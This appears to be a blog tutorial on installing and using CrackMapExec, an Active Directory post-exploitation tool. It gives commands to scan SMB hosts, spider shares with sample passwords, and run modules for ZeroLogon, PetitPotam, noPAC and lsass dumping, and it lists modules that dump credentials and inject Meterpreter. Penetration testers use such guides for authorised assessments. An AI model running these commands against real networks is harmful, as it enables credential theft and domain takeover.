CrackMapExec (also known as CME) is a post-exploitation program that assists in automating the security assessment of large Active Directory infrastructures.
CME was designed with stealth in mind, exploiting built-in Active Directory functionality to achieve its functionality and evading most endpoint protection/IDS/IPS technologies.
How to Install CrackMapExec
If you are using Kali you can install it from Kali repos but I recommend you install it from git source.
apt install crackmapexecIn this article I will install it on a Linux machine but if you need you can use it on Windows or using docker.
First, let’s install some dependencies
apt-get install -y libssl-dev libkrb5-dev libffi-dev python-dev build-essentialgit clone https://github.com/Porchetta-Industries/CrackMapExeccd CrackMapExecpoetry installpoetry run crackmapexecConfigure Databases
Configure new Certificate
CME Configuration folder
┌──(rfs㉿local-c2)-[~]
└─$ cd ~/.cmeChange CrackMapExec certificate
┌──(rfs㉿local-c2)-[~]
└─$ vi ~/.cme/cme.conf┌──(rfs㉿local-c2)-[~]
└─$ openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pemTarget Definition
crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txtCME Supported Protocols
SMB
MSSQL
LDAP
SSH
RDP
WINRMSamba Protocol
We will start scanning a network as an example and then a specific host on the network
crackmapexec smb 192.168.1.0/24crackmapexec smb 192.168.1.91Search Text Files
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'poplab!sec' --spider C\$ --pattern txtCME SMB Modules
Vulnerabilities
| SMB Module | Description |
|---|---|
| ZeroLogon | Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472 |
| Petitpotam | Module to check if the DC is vulnerable to PetitPotam, credit to @topotam |
| ms17-010 | MS17-010, /!\ not tested oustide home lab |
| dfscoerce | Module to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam |
| nopac | Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user |
| shadowcoerce | Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam |
Credentials
| Module | Description |
|---|---|
| gpp_autologin | Searches the domain controller for registry.xml to find autologon information and returns the username and password. |
| gpp_password | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. |
| handlekatz | Get lsass dump using handlekatz64 and parse the result with pypykatz |
| hash_spider | Dump lsass recursively from a given hash using BH to find local admins |
| keepass_discover | Search for KeePass-related files and process. |
| keepass_trigger | Set up a malicious KeePass trigger to export the database in cleartext. |
| lsassy | Dump lsass and parse the result remotely with lsassy |
| masky | Remotely dump domain user credentials via an ADCS and a KDC |
| teams_localdb | Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process |
| wdigest | Creates/Deletes the ‘UseLogonCredential’ registry key enabling WDigest cred dumping on Windows >= 8.1 |
| wireless | Get key of all wireless interfaces |
Scan for Samba vulnerabilities with CME
ZeroLogon
crackmapexec smb <ip> -u '' -p '' -M zerologoPetitPotam
crackmapexec smb <ip> -u '' -p '' -M petitpotamnoPAC
crackmapexec smb <ip> -u 'user' -p 'pass' -M nopacNanodump
crackmapexec smb $TARGET -u Administrator -p 'qwerty12345' -M nanodump[*] nanodump module options:
TMP_DIR Path where process dump should be saved on target system (default: C:\Windows\Temp\)
NANO_PATH Path where nano.exe is on your system (default: /tmp/cme/)
NANO_EXE_NAME Name of the nano executable (default: nano.exe)
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)MSSQL Protocol
CrackMapExec Modules to attack MsSQL Service.
MsSQL Modules
| Module | Description |
|---|---|
| empire_exec | Uses Empire’s RESTful API to generate a launcher for the specified listener and executes it |
| met_inject | Downloads the Meterpreter stager and injects it into memory |
| mssql_priv | Enumerate and exploit MSSQL privileges |
| nanodump | Get lsass dump using nanodump and parse the result with pypykatz |
| test_connection | Pings a host |
| web_delivery | Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module |